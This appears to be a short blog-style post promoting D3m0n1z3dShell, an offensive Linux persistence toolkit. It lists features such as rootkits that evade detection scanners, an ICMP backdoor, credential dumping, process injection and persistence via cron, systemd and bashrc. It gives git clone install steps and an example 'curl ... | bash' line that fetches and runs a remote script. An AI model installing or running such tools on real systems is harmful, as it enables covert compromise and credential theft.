D3m0n1z3dShell: Advanced Tool for persistence in Linux

by do son ·

Linux persistence

D3m0n1z3dShell

Demonized Shell is an Advanced Tool for persistence in Linux.

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit With file encoder. persistent icmp backdoor and other features.
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling, and Other Binaries.
  • Process Injection
  • install for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • ELF/Rootkit Anti-Reversing Technique
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence

Pending Features

  • LD_PRELOAD Rootkit
  • Intercept Syscall Write from a file
  • PAM Backdoor
  • Persistence via php webshell and aspx webshell

Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

Copyright (C) 2024 MatheuZSecurity

Tags: LinuxLinux persistencepersistence